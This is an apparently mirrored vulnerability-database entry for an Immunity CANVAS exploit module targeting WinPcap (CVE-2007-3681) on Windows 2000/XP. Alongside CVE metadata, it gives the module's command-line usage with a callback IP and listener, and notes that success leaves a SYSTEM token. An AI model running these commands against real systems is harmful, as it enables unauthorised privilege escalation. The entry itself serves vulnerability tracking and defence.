Immunity Canvas: WINPCAP

2007-07-11T17:30:00
ID WINPCAP
Type canvas
Reporter Immunity Canvas
Modified 2007-07-11T17:30:00

Description

Name| winpcap
---|---
CVE| CVE-2007-3681
Exploit Pack| CANVAS
Description| winpcap
Notes| CVE Name: CVE-2007-3681
VENDOR: WinPcap.org
URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=550
Notes:

This exploit will auto-target based on reading a kernel file on Windows 2000
or XP. It will generate a target fingerprint when you run the auto-targeter -
this is useful when you don't have read access to the kernel files and still want
to run the exploit. It will leave a SYSTEM token as your current token, if it succeeds

example commandline usage on Windows 2000 SP4 English

we set our callback IP to 10.10.10.6 in the test lab

runmodule winpcap -l 10.10.10.6 -d 5555

Make sure you have a listener listening already before you run the above
command.
./commandlineInterface -v 1 -p 5555

If you get the wrong version, (-v 1 on an XP box, say) you'll see an ACCESS_VIOLATION
bluescreen. Then it will dump memory.

Date public: 07/09/2007
CVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3681
CVSS: 6.6